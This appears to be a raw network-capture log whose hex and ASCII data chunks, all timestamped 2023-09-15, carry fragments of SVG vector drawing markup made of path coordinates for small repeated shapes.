                                                                                                                                                                              2023-09-15 05:27:26 UTC964INData Raw: 22 4d 38 35 35 2e 31 37 2c 33 38 32 2e 38 36 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 35 35 2e 32 35 2c 33 37 34 2e 31 38 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 36 2c 33 2e 31 36 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c
                                                                                                                                                                              Data Ascii: "M855.17,382.86a2.15,2.15,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M855.25,374.18a2.15,2.15,0,0,1-1.09,2.75,3.16,3.16,0,0,1-4.13-1.36,3,3,0,0,1,.8-3.58,2.83,2.83,0,
                                                                                                                                                                              2023-09-15 05:27:26 UTC980INData Raw: 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 33 2e 36 31 2e 32 2c 32 2e 36 34 2c 32 2e 36 34 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 39 30 2c 34 33 35 2e 32 35 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 37 22 2f 3e 3c 70 61 74
                                                                                                                                                                              Data Ascii: .1,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.8-3.58,2.8,2.8,0,0,1,3.61.2,2.64,2.64,0,0,1,0,3.57"/><path class="cls-9" d="M890,435.25a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.79-3.58,2.82,2.82,0,0,1,3.62.2,2.63,2.63,0,0,1,0,3.57"/><pat
                                                                                                                                                                              2023-09-15 05:27:26 UTC996INData Raw: 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 31 38 2e 30 36 2c 32 35 33 2e 32 31 41 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2c 39 31 37 2c 32 35 36 61 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33
                                                                                                                                                                              Data Ascii: 0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"/><path class="cls-9" d="M918.06,253.21A2.15,2.15,0,0,1,917,256a3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3
                                                                                                                                                                              2023-09-15 05:27:26 UTC1012INData Raw: 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 31 39 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 35 32 2e 38 2c 33 31 34 2e 32 38 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 33 2e 36 31 2e 31 39 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39
                                                                                                                                                                              Data Ascii: ,0,0,1-4.13-1.35,3,3,0,0,1,.8-3.58,2.81,2.81,0,0,1,3.62.19,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M952.8,314.28a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.8-3.58,2.8,2.8,0,0,1,3.61.19,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9
                                                                                                                                                                              2023-09-15 05:27:26 UTC1028INData Raw: 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 39 2e 35 38 2c 32 35 31 2e 36 33 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 39 2e 32 38 2c 32 34 32 2e 38 35 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30
                                                                                                                                                                              Data Ascii: 2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="M59.58,251.63a2.19,2.19,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3.06,3.06,0,0,1,.65-3.66,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M59.28,242.85a2.18,2.18,0,0
                                                                                                                                                                              2023-09-15 05:27:26 UTC1044INData Raw: 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 39 37 2c 33 30 33 2e 30 39 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d
                                                                                                                                                                              Data Ascii: 8,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="M97,303.09a2.19,2.19,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-
                                                                                                                                                                              2023-09-15 05:27:26 UTC1060INData Raw: 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 37 2c 32 2e 36 37 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 31 37 2e 35 36 2c 31 31 37 2e 38 33 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 31 37 2e 32 36 2c 31 30 39 2e 30 35 61 32 2e 31 38 2c 32 2e 31 38 2c
                                                                                                                                                                              Data Ascii: 6,2.86,2.86,0,0,1,3.67,0,2.67,2.67,0,0,1,.19,3.61"/><path class="cls-7" d="M117.56,117.83a2.19,2.19,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M117.26,109.05a2.18,2.18,
                                                                                                                                                                              2023-09-15 05:27:26 UTC1076INData Raw: 31 2e 32 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 35 35 2e 33 31 2c 31 37 38 2e 30 38 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 32 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 34 2c 32 2e 38 34 2c 30 2c 30 2c 31 2c 33 2e 36 36 2c 30 2c 32 2e 36 37 2c 32 2e 36 37 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 35 35 2c 31
                                                                                                                                                                              Data Ascii: 1.2,3,3,0,0,1,.64-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M155.31,178.08a2.17,2.17,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.2,3,3,0,0,1,.65-3.65,2.84,2.84,0,0,1,3.66,0,2.67,2.67,0,0,1,.2,3.62"/><path class="cls-7" d="M155,1
                                                                                                                                                                              2023-09-15 05:27:26 UTC1092INData Raw: 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 39 33 2e 30 37 2c 32 33 38 2e 33 32 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 39 32 2e 37 37 2c 32 32 39 2e 35 34 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c
                                                                                                                                                                              Data Ascii: 0,2.68,2.68,0,0,1,.2,3.61"/><path class="cls-7" d="M193.07,238.32a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.22-1.19,3.06,3.06,0,0,1,.64-3.66,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M192.77,229.54a2.17,2.17,0,0,1-1,2.83,3.18,
                                                                                                                                                                              2023-09-15 05:27:26 UTC1108INData Raw: 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 33 30 2e 38 33 2c 32 39 38 2e 35 37 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 32 2c 33 2e 32 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 32 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 33 30 2e 35
                                                                                                                                                                              Data Ascii: 1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="M230.83,298.57a2.19,2.19,0,0,1-1,2.83,3.2,3.2,0,0,1-4.23-1.2,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M230.5
                                                                                                                                                                              2023-09-15 05:27:26 UTC1124INData Raw: 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 35 31 2e 33 35 2c 31 31 33 2e 33 31 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 32 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d
                                                                                                                                                                              Data Ascii: 3-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="M251.35,113.31a2.17,2.17,0,0,1-1,2.82,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M
                                                                                                                                                                              2023-09-15 05:27:26 UTC1140INData Raw: 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 38 39 2e 31 2c 31 37 33 2e 35 35 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 34 2c 32 2e 38 34 2c 30 2c 30 2c 31 2c 33 2e 36 36 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22
                                                                                                                                                                              Data Ascii: 1-4.22-1.19,3.06,3.06,0,0,1,.64-3.66,2.86,2.86,0,0,1,3.67.05,2.68,2.68,0,0,1,.2,3.61"/><path class="cls-7" d="M289.1,173.55a2.17,2.17,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.66,2.84,2.84,0,0,1,3.66.05,2.66,2.66,0,0,1,.2,3.61"/><path class="
                                                                                                                                                                              2023-09-15 05:27:26 UTC1156INData Raw: 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 32 36 2e 38 36 2c 32 33 33 2e 38 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 32 2c 33 2e 31 37 2c 33 2e 31 37 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c
                                                                                                                                                                              Data Ascii: ,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M326.86,233.8a2.17,2.17,0,0,1-1,2.82,3.17,3.17,0,0,1-4.22-1.19,3,3,0,0,1,.64-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><
                                                                                                                                                                              2023-09-15 05:27:26 UTC1172INData Raw: 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 32 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 36 34 2e 36 32 2c 32 39 34 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61
                                                                                                                                                                              Data Ascii: 18,0,0,1-4.23-1.2,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="M364.62,294a2.19,2.19,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3.06,3.06,0,0,1,.65-3.66,2.86,2.86,0,0,1,3.67.05,2.68,2.68,0,0,1,.2,3.61"/><path cla
                                                                                                                                                                              2023-09-15 05:27:26 UTC1188INData Raw: 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 32 39 30 2e 36 34 2c 32 30 32 2e 33 37 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 37 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 32 39 30 2e 33 37 2c 31 39 34 2e 32 39 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e
                                                                                                                                                                              Data Ascii: ass="cls-9" d="M290.64,202.37a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.6-3.37,2.63,2.63,0,0,1,3.37,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M290.37,194.29a2,2,0,0,1-.91,2.61,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.
                                                                                                                                                                              2023-09-15 05:27:26 UTC1204INData Raw: 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 32 34 2e 38 33 2c 32 34 31 2e 36 35 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 38 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 32 34 2e 35 36 2c 32 33 33
                                                                                                                                                                              Data Ascii: 8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M324.83,241.65a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.88-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M324.56,233
                                                                                                                                                                              2023-09-15 05:27:26 UTC1220INData Raw: 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 35 39 2e 33 2c 32 38 39 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 37 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2e 30 35 2c 32 2e 34 35 2c 32 2e 34 35 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 35 39 2c 32 38 30 2e 39 32 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d
                                                                                                                                                                              Data Ascii: 38,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M359.3,289a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.6-3.37,2.62,2.62,0,0,1,3.37.05,2.45,2.45,0,0,1,.18,3.32"/><path class="cls-9" d="M359,280.92a2,2,0,0,1-.91,2.61,2.93,2.93,0,0,1-
